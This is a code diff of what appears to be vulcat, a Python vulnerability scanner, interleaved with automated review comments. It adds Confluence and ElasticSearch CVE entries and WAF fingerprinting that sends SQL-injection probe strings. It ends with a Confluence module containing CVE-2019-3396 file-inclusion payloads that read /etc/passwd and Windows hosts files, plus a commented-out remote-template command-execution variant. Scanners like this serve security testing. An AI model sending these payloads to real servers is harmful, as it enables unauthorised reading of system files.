@@ -75,6 +110,7 @@ def addPOC(self, url):
logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
_exit(0)
+
def scanning(self):
''' 正在扫描, 根据线程数启动poc '''
queue_thread = int(self.queue.qsize() / self.thread)+1 # * 循环次数
@@ -93,24 +129,36 @@ def scanning(self):
except KeyboardInterrupt:
if self.stop():
continue
+ else:
+ self.queue.queue.clear() # * 清空当前url的扫描队列
+ break # * 停止当前url的扫描, 并扫描下一个url
+
+
def stop(self):
''' # ! 功能还没写好
Ctrl+C暂停扫描
q(uit) 退出扫描
c(ontinue) 继续扫描
+ n(ext) 跳过当前url的扫描
m(odify) (还没写好)修改参数, 输入参数名和值(如-t 3)然后回车, 修改相应参数, 并继续扫描
wq(save and exit) 等待已经运行的poc, 保存并输出已有的漏洞结果, 有--output参数的话则同步保存至文件
'''
while True:
- logger.info('reset', '[CTRL+C] q(uit)/c(ontinue)/wq(save and exit): ') # ? 提示信息
- operation = input('\r'.ljust(70)) # * 接收参数
- if operation == 'q': # * 退出
+ logger.info('reset', '', print_end='') # ? 提示信息
+ operation = input('\r[CTRL+C] - q(uit)/c(ontinue)/n(ext)/wq(save and exit): '.ljust(70))# * 接收参数
+ operation = operation.lower() # * 字母转小写
+
+ if operation in ['q', 'quit']: # * 退出扫描
_exit(0)
- elif operation == 'c': # * 继续扫描
+ elif operation in ['c', 'continue']: # * 继续扫描
logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
return True
- elif operation == 'wq': # * 保存退出
+ elif operation in ['wq', 'save and exit']: # * 保存结果并退出
self.end()
+ elif operation in ['n', 'next']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 扫描下一个目标
+
+ return False
def end(self):
''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存'''
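Review bot: `self.queue.queue.clear()` at L476 reaches into `Queue`'s internal deque without taking its lock while worker threads may still be blocked in `get()`; clear it under the queue's own mutex, `with self.queue.mutex: self.queue.queue.clear()`, and note that `unfinished_tasks` is left untouched, which matters if `join()`/`task_done()` are used elsewhere (not visible here). In `stop()`, the indentation of the trailing `return False` at L509 is not recoverable from the diff; if it sits at loop-body level, any unrecognised answer (not only `n`/`next`) now silently skips the current URL, whereas the pre-change loop re-prompted, so the `n`/`next` branch should `return False` explicitly and the loop should fall through to the next prompt otherwise. The enclosing `scanning()` body begins outside this hunk.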
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 1780e68..26548e4 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -77,7 +77,7 @@ def __init__(self, args):
'https': args.http_proxy
}
- app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'django', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou']
+ app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'confluence', 'django', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou']
if args.application == 'all': # * -a参数
args.app_list = app_list
else:
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 242cc0e..68e3947 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -47,6 +47,12 @@ def language():
'output_text': 'Save the scan results in TXT format, no vulnerability will not generate files(e.g. --output-text result.txt)',
'output_json': 'Save the scan results in JSON format, no vulnerability will not generate files(e.g. --output-text result.json)'
},
+ 'general_help': {
+ 'title': 'General',
+ 'name': 'General operating parameter',
+ 'no_waf': 'Disable WAF detection',
+ 'batch': 'The yes/no option does not require user input. The default option is used'
+ },
'lists_help': {
'title': 'Lists',
'name': 'Vulnerability list',
@@ -54,19 +60,26 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
+ 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
},
'core': {
'start': {
'start': '[INFO] Start scanning target ',
- 'unable': '[WARN] Unable to connect to '
+ 'unable': '[WARN] Unable to connect to ',
+ 'waf': '[WAF] The WAF detection for the current URL starts',
+ 'waf_find': '[WAF] {} is detected, Whether to continue scanning the current URL? - y(es)/N(o): ',
+ 'waf_not_find': 'Not found the WAF',
+ 'waf_timeout': 'WAF recognizes timeout and the target is not responding',
+ 'waf_conn_error': 'WAF recognition error, unable to connect to destination URL',
+ 'waf_error': 'WAF identification error, unknown error'
},
'addpoc': {
'notfound': '[ERROR] The application not found: ',
'error': '[ERROR] The addPOC is error'
},
'stop': {
- 'continue': '[INFO] Continue to scan'
+ 'continue': '[INFO] Continue to scan',
+ 'next': '[INFO] Skip current URL'
},
'end': {
'wait': '[INFO] Wait for all threads to finish. Please wait...',
@@ -126,6 +139,12 @@ def language():
'output_text': '以txt格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.txt)',
'output_json': '以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json)'
},
+ 'general_help': {
+ 'title': 'General',
+ 'name': '通用工作参数',
+ 'no_waf': '禁用waf检测',
+ 'batch': 'yes/no的选项不需要用户输入, 使用默认选项'
+ },
'lists_help': {
'title': 'Lists',
'name': '漏洞列表',
@@ -133,19 +152,26 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
+ 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou'
},
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
- 'unable': '[WARN] 无法连接到 '
+ 'unable': '[WARN] 无法连接到 ',
+ 'waf': '[WAF] 开始对当前url进行WAF检测',
+ 'waf_find': '[WAF] 目标疑似存在{} 是否继续扫描当前url? - y(es)/N(o): ',
+ 'waf_not_find': '[WAF] 未发现WAF',
+ 'waf_timeout': 'WAF识别超时, 目标没有响应',
+ 'waf_conn_error': 'WAF识别出错, 无法连接至目标url',
+ 'waf_error': 'WAF识别出错, 未知错误'
},
'addpoc': {
'notfound': '[ERROR] 未找到应用程序: ',
'error': '[ERROR] 添加POC时出现错误'
},
'stop': {
- 'continue': '[INFO] 继续扫描'
+ 'continue': '[INFO] 继续扫描',
+ 'next': '[INFO] 跳过当前url'
},
'end': {
'wait': '[INFO] 等待所有线程结束, 请稍等...',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 126b3cb..c75703c 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -6,20 +6,23 @@
def list():
''' 显示漏洞列表 '''
+ vul_num = 0
vul_list = ''
- vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
- vul_list += '| {}|'.format(vul.ljust(14))
+ vul_num += 1
+ vul_list += '| {}|'.format(vul.ljust(21))
vul_list += ' {}|'.format(info['vul_id'].ljust(17))
- vul_list += ' {}|'.format(info['type'].ljust(11))
+ vul_list += ' {}|'.format(info['type'].ljust(13))
vul_list += ' {}|'.format(info['method'].ljust(9))
- vul_list += ' {}\t|'.format(info['description'].ljust(49))
+ vul_list += ' {}\t|'.format(info['description'].ljust(56))
vul_list += '\n'
- vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
- print(color.cyan(vul_list))
+ print(color.cyan(vul_list + str(vul_num - 1)))
+ # print(vul_num)
sys.exit(0)
vul_info = {
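Review bot: `print(color.cyan(vul_list + str(vul_num - 1)))` at L640 appends a bare number directly after the table, and the `- 1` silently compensates for what appears to be a header row stored as the first `vul_info` entry (the `'Description\t'` entry in the next hunk's context); a reader cannot tell what the number means. Label it and explain the offset, e.g. `print(color.cyan(vul_list + 'Total: {}'.format(vul_num - 1)))` with `# * the first vul_info entry is the table header, not a vulnerability` above it, and drop the leftover `# print(vul_num)` at L641. The column widths at L624 and L638 are repeated literally in two places; a single `sep = '+' + ('-'*22) + ...` computed once would keep them from drifting apart again.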
@@ -31,7 +34,7 @@ def list():
'description': 'Description\t'
}
],
- 'AlibabaDruid': [
+ 'Alibaba Druid': [
{
'vul_id': 'None',
'type': 'unAuth',
@@ -39,7 +42,7 @@ def list():
'description': '阿里巴巴Druid未授权访问'
}
],
- 'AlibabaNacos': [
+ 'Alibaba Nacos': [
{
'vul_id': 'CVE-2021-29441',
'type': 'unAuth',
@@ -47,7 +50,7 @@ def list():
'description': '阿里巴巴Nacos未授权访问'
}
],
- 'ApacheAirflow': [
+ 'Apache Airflow': [
{
'vul_id': 'CVE-2020-17526',
'type': 'unAuth',
@@ -55,7 +58,7 @@ def list():
'description': 'Airflow身份验证绕过'
}
],
- 'ApacheAPISIX': [
+ 'Apache APISIX': [
{
'vul_id': 'CVE-2020-13945',
'type': 'unAuth',
@@ -63,7 +66,7 @@ def list():
'description': 'Apache APISIX默认密钥'
}
],
- 'ApacheFlink': [
+ 'Apache Flink': [
{
'vul_id': 'CVE-2020-17519',
'type': 'FileRead',
@@ -71,7 +74,7 @@ def list():
'description': 'Flink目录遍历'
}
],
- 'ApacheSolr': [
+ 'Apache Solr': [
{
'vul_id': 'CVE-2021-27905',
'type': 'SSRF',
@@ -79,7 +82,7 @@ def list():
'description': 'Solr SSRF/任意文件读取'
}
],
- 'ApacheStruts2': [
+ 'Apache Struts2': [
{
'vul_id': 'S2-001',
'type': 'RCE',
@@ -117,7 +120,7 @@ def list():
'description': 'Struts2远程代码执行'
}
],
- 'ApacheTomcat': [
+ 'Apache Tomcat': [
{
'vul_id': 'CVE-2017-12615',
'type': 'FileUpload',
@@ -133,6 +136,32 @@ def list():
'description': 'AppWeb身份认证绕过'
}
],
+ 'Atlassian Confluence': [
+ {
+ 'vul_id': 'CVE-2015-8399',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Confluence任意文件包含'
+ },
+ {
+ 'vul_id': 'CVE-2019-3396',
+ 'type': 'RCE/FileRead',
+ 'method': 'POST',
+ 'description': 'Confluence路径遍历和命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2021-26084',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入'
+ },
+ {
+ 'vul_id': 'CVE-2022-26134',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'Confluence远程代码执行'
+ }
+ ],
'Cisco': [
{
'vul_id': 'CVE-2020-3580',
@@ -148,18 +177,18 @@ def list():
'method': 'GET',
'description': 'debug page XSS跨站脚本攻击'
},
- {
- 'vul_id': 'CVE-2019-14234',
- 'type': 'SQLinject',
- 'method': 'GET',
- 'description': 'JSONfield SQL注入'
- },
{
'vul_id': 'CVE-2018-14574',
'type': 'Redirect',
'method': 'GET',
'description': 'CommonMiddleware url重定向'
},
+ {
+ 'vul_id': 'CVE-2019-14234',
+ 'type': 'SQLinject',
+ 'method': 'GET',
+ 'description': 'JSONfield SQL注入'
+ },
{
'vul_id': 'CVE-2020-9402',
'type': 'SQLinject',
@@ -173,7 +202,33 @@ def list():
'description': 'QuerySet.order_by SQL注入'
}
],
- 'F5-BIG-IP': [
+ 'ElasticSearch': [
+ {
+ 'vul_id': 'CVE-2014-3120',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'ElasticSearch命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2015-1427',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2015-3337',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'ElasticSearch 目录穿越'
+ },
+ {
+ 'vul_id': 'CVE-2015-5531',
+ 'type': 'FileRead',
+ 'method': 'PUT/GET',
+ 'description': 'ElasticSearch 目录穿越'
+ },
+ ],
+ 'F5 BIG-IP': [
{
'vul_id': 'CVE-2020-5902',
'type': 'RCE',
@@ -189,16 +244,16 @@ def list():
],
'Fastjson': [
{
- 'vul_id': 'CNVD-2019-22238',
+ 'vul_id': 'CNVD-2017-02833',
'type': 'unSerialize',
'method': 'POST',
- 'description': 'Fastjson <= 1.2.47 反序列化'
+ 'description': 'Fastjson <= 1.2.24 反序列化'
},
{
- 'vul_id': 'CVE-2017-18349',
+ 'vul_id': 'CNVD-2019-22238',
'type': 'unSerialize',
'method': 'POST',
- 'description': 'Fastjson <= 1.2.24 反序列化'
+ 'description': 'Fastjson <= 1.2.47 反序列化'
}
],
'Keycloak': [
@@ -211,10 +266,10 @@ def list():
],
'Spring': [
{
- 'vul_id': 'CVE-2022-22965',
- 'type': 'RCE',
- 'method': 'GET/POST',
- 'description': 'Spring Framework远程代码执行'
+ 'vul_id': 'CVE-2020-5410',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Spring Cloud目录遍历'
},
{
'vul_id': 'CVE-2021-21234',
@@ -223,10 +278,10 @@ def list():
'description': 'Spring Boot目录遍历'
},
{
- 'vul_id': 'CVE-2020-5410',
- 'type': 'FileRead',
- 'method': 'GET',
- 'description': 'Spring Cloud目录遍历'
+ 'vul_id': 'CVE-2022-22947',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Spring Cloud Gateway SpEl远程代码执行'
},
{
'vul_id': 'CVE-2022-22963',
@@ -235,13 +290,19 @@ def list():
'description': 'Spring Cloud Function SpEL远程代码执行'
},
{
- 'vul_id': 'CVE-2022-22947',
+ 'vul_id': 'CVE-2022-22965',
'type': 'RCE',
- 'method': 'POST',
- 'description': 'Spring Cloud Gateway SpEl远程代码执行'
+ 'method': 'GET/POST',
+ 'description': 'Spring Framework远程代码执行'
}
],
'ThinkPHP': [
+ {
+ 'vul_id': 'CVE-2018-1002015',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'ThinkPHP5.x 远程代码执行'
+ },
{
'vul_id': 'CNVD-2018-24942',
'type': 'RCE',
@@ -275,18 +336,18 @@ def list():
'description': 'Ueditor编辑器SSRF'
}
],
- 'Weblogic': [
+ 'Oracle Weblogic': [
{
- 'vul_id': 'CVE-2020-14882',
- 'type': 'RCE',
+ 'vul_id': 'CVE-2014-4210',
+ 'type': 'SSRF',
'method': 'GET',
- 'description': 'Weblogic 未授权命令执行'
+ 'description': 'Weblogic 服务端请求伪造'
},
{
- 'vul_id': 'CVE-2020-14750',
- 'type': 'unAuth',
- 'method': 'GET',
- 'description': 'Weblogic 权限验证绕过'
+ 'vul_id': 'CVE-2017-10271',
+ 'type': 'unSerialize',
+ 'method': 'POST',
+ 'description': 'Weblogic XMLDecoder反序列化'
},
{
'vul_id': 'CVE-2019-2725',
@@ -295,16 +356,16 @@ def list():
'description': 'Weblogic wls9_async反序列化'
},
{
- 'vul_id': 'CVE-2017-10271',
- 'type': 'unSerialize',
- 'method': 'POST',
- 'description': 'Weblogic XMLDecoder反序列化'
+ 'vul_id': 'CVE-2020-14750',
+ 'type': 'unAuth',
+ 'method': 'GET',
+ 'description': 'Weblogic 权限验证绕过'
},
{
- 'vul_id': 'CVE-2014-4210',
- 'type': 'SSRF',
+ 'vul_id': 'CVE-2020-14882',
+ 'type': 'RCE',
'method': 'GET',
- 'description': 'Weblogic 服务端请求伪造'
+ 'description': 'Weblogic 未授权命令执行'
}
],
'Yonyou': [
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 521ba05..362261c 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -18,7 +18,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.0.7\n')
+''', version='vulcat.py-1.0.9\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -48,6 +48,12 @@ def parse():
save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text'])
save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json'])
+ # * 通用参数
+ general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name'])
+ general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf'])
+ # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='')
+ general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch'])
+
# * 查看漏洞列表
lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name'])
lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true')
diff --git a/lib/tool/check.py b/lib/tool/check.py
index 0e4724a..ea658d2 100644
--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -41,7 +41,7 @@ def check_res(res, md):
''' 检查poc误报
来自: https://github.com/zhzyker/vulmap/blob/main/core/verify.py
'''
- res_info = "echo.{0,10}" + md
+ res_info = "echo.{0,20}" + md
if(re.search(res_info, res) != None):
return "not_vul"
else:
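Review bot: The marker `md` is concatenated into the regex pattern unescaped on the changed line, `"echo.{0,20}" + md`; today callers pass an md5 hex string, but the new Confluence scanner passes `"'X-Cmd-Response': '" + self.md` as `md`, so any regex metacharacter in a future marker silently changes what the false-positive check matches. `res_info = "echo.{0,20}" + re.escape(md)` preserves the intent for any marker. Worth a comment on why the window was widened from 10 to 20, e.g. `# * 20 chars covers "echo " plus quoting/redirection the target may echo back`. The `def check_res` line is outside this hunk.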
diff --git a/lib/tool/fingerprint.py b/lib/tool/fingerprint.py
index 56b2f5b..81e9278 100644
--- a/lib/tool/fingerprint.py
+++ b/lib/tool/fingerprint.py
@@ -1,15 +1,183 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-''' 还没写好, 敬请期待
+'''
+ web应用程序防火墙 指纹识别
+ 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
- 用于web指纹识别
- Used for Web fingerprint identification
+ web应用程序/框架 指纹识别
+ 敬请期待
'''
-def fingerprint():
- pass
+from lib.initial.config import config
+from lib.tool.logger import logger
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Identify():
+ def webapp_identify(self):
+ '''
+ web应用程序/框架识别
+ '''
+
+
+ def waf_identify(self, url):
+ '''
+ waf识别
+ '''
+ try:
+ vul_info = {
+ 'app_name': 'WAF',
+ 'vul_id': 'identify'
+ }
+ path_1 = '?id=1 and 1=1 -- qwe'
+ path_2 = '?id=1\'">//'
+
+ url_1 = url + path_1
+ url_2 = url + path_2
+
+ logger.info('yellow_ex', self.lang['core']['start']['waf'])
+
+ res = requests.get(
+ url_2,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ res.encoding = 'utf-8'
+ for waf_fp in self.waf_fingerprint:
+ for finger in waf_fp['fingerprint']:
+ # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
+ if (finger in res.text):
+ return waf_fp['name']
+
+ return None
+ except requests.ConnectTimeout:
+ logger.info('red_ex', self.lang['core']['start']['waf_timeout'])
+ return None
+ except requests.ConnectionError:
+ logger.logging('red_ex', self.lang['core']['start']['waf_conn_error'])
+ return None
+ except:
+ logger.logging('red_ex', self.lang['core']['start']['waf_error'])
+ return None
+
+
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+ self.lang = config.get('lang')
+
+ # * webapp指纹库
+ self.webapp_fingerprint = [
+ '敬请期待'
+ ]
+ # * waf指纹库
+ self.waf_fingerprint = [
+ {
+ 'name': '阿里云盾(Aliyun Waf)',
+ 'status_code': 405,
+ 'fingerprint': [
+ '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
+ 'your request has been blocked as it may cause potential threats to the server'
+ ]
+ },
+ {
+ 'name': '腾讯云盾(Tencent WAF)',
+ 'status_code': 403,
+ 'fingerprint': [
+ '腾讯T-Sec Web应用防火墙(WAF)',
+ # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
+ ]
+ },
+ {
+ 'name': '安全狗(SafeDog)',
+ 'status_code': None,
+ 'fingerprint': [
+ '如果您是网站管理员,请登录安全狗',
+ '您的请求带有不合法参数,已被网站管理员设置拦截'
+ ]
+ },
+ {
+ 'name': '华为云盾(HuaWei WAF)',
+ 'status_code': 418,
+ 'fingerprint': [
+ '您的请求疑似攻击行为'
+ ]
+ },
+ {
+ 'name': '网宿云盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您当前的访问行为存在异常,请稍后重试'
+ ]
+ },
+ {
+ 'name': '创宇盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '当前访问疑似黑客攻击,已被创宇盾拦截',
+ '最近有可疑的攻击行为,请稍后重试'
+ ]
+ },
+ {
+ 'name': '玄武盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您的访问可能对网站造成危险,已被云防护安全拦截'
+ ]
+ },
+ # {
+ # 'name': '360网站卫士',
+ # 'status_code': None,
+ # 'fingerprint': [
+ # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
+ # ]
+ # },
+ # {
+ # 'name': '奇安信网站卫士 ',
+ # 'status_code': 493,
+ # 'fingerprint': [
+ # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
+ # ]
+ # },
+ {
+ 'name': '长亭SafeLine',
+ 'status_code': 403,
+ 'fingerprint': [
+ '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
+ ]
+ },
+ {
+ 'name': 'OpenRASP',
+ 'status_code': 400,
+ 'fingerprint': [
+ 'Request blocked by OpenRASP',
+ '您的请求包含恶意行为,已被服务器拒绝'
+ ]
+ },
+ {
+ 'name': '西部数码云网盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '检测到疑似攻击行为,访问已被云网盾拦截',
+ '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
+ ]
+ },
+ # {
+ # 'name': '',
+ # 'status_code': 403,
+ # 'fingerprint': [
+ # ''
+ # ]
+ # }
+ ]
-def identify():
- pass
\ No newline at end of file
+identify = Identify()
\ No newline at end of file
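Review bot: The `ConnectionError` and catch-all handlers at L1042 and L1045 call `logger.logging('red_ex', msg)`, while the timeout branch at L1039 uses `logger.info('red_ex', msg)` and every other `logger.logging` call in this hunk takes `(vul_info, status_code, res)` (L1028), so those two branches most likely raise inside the exception handler instead of printing; change both to `logger.info('red_ex', ...)`. `requests.ConnectTimeout` does not cover `requests.ReadTimeout`, so a target that accepts the connection but never answers the probe falls into the bare `except:` — which also swallows `KeyboardInterrupt` during the probe; `except requests.Timeout:` and `except Exception:` fix both. `path_1`/`url_1` at L1012 and L1015 are assigned but never used, and `webapp_identify` at L997 has only a docstring, so callers get `None` — a `# TODO` or `raise NotImplementedError` would make that explicit.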
diff --git a/lib/tool/head.py b/lib/tool/head.py
new file mode 100644
index 0000000..44693ef
--- /dev/null
+++ b/lib/tool/head.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env /python3
+# -*- coding:utf-8 -*-
+
+'''
+ Headers请求头处理
+ 合并2个headers
+'''
+
+def merge(old_headers, new_headers):
+ '''
+ 用于合并2个headers, 并返回合并后的headers, 新headers将会覆盖旧headers中的同名内容.
+ '''
+
+ merge_headers = old_headers.copy()
+ merge_headers.update(new_headers)
+ return merge_headers
\ No newline at end of file
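Review bot: The shebang at L1170 is `#!/usr/bin/env /python3`, which asks `env` for an executable literally named `/python3`; the other files in this commit use `#!/usr/bin/env python3`. The file also ends without a trailing newline. `merge` itself is fine; the same result can be written in one expression, `return {**old_headers, **new_headers}`, and the docstring should state that the inputs are not modified, which the `.copy()` guarantees.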
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 34aabd5..254f1e0 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -91,6 +91,7 @@ def logging_5(self, vul_info, status_code, res):
def logging_6(self, vul_info, status_code, res):
''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 '''
+ res.encoding = 'utf-8'
info_6 = self.logging_5(vul_info, status_code, res)
try:
info_6 = info_6[:-1]
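Review bot: `res.encoding = 'utf-8'` at L1194 mutates the caller's response object from inside a logging routine, so every later `res.text` read — presumably including the scanners' detection checks that run after `logger.logging(...)` — is decoded as UTF-8 regardless of the charset the server declared. If the intent is only readable log output, decode a local copy instead, e.g. `text = res.content.decode('utf-8', errors='replace')`, or at least add `# * NOTE: overrides the response charset for all later res.text reads` so the side effect is visible. The body of `logging_6` continues past the hunk.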
diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py
new file mode 100644
index 0000000..1d4d67a
--- /dev/null
+++ b/payloads/AtlassianConfluence.py
@@ -0,0 +1,386 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ Atlassian Confluence扫描类:
+ 1. Confluence路径遍历和命令执行
+ CVE-2019-3396
+ Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/
+
+ 2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入
+ CVE-2021-26084
+ Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/
+
+ 3. Confluence任意文件包含
+ CVE-2015-8399
+ Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003
+
+ 4. Confluence远程代码执行
+ CVE-2022-26134
+ Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+file:///C:/Windows/System32/drivers/etc/hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class AtlassianConfluence():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers').copy()
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'AtlassianConfluence'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2019_3396_payloads = [
+ # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件
+ # 'path': 'rest/tinymce/1/macro/preview',
+ # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + self.cmd + '}}}',
+ # 'headers': self.headers.update({
+ # 'Content-Type': 'application/json; charset=utf-8'
+ # })
+ # },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ },
+ {
+ 'path': 'rest/tinymce/1/macro/preview',
+ 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}',
+ 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'})
+ }
+ ]
+
+ self.cve_2021_26084_payloads = [
+ {
+ 'path': 'pages/doenterpagevariables.action',
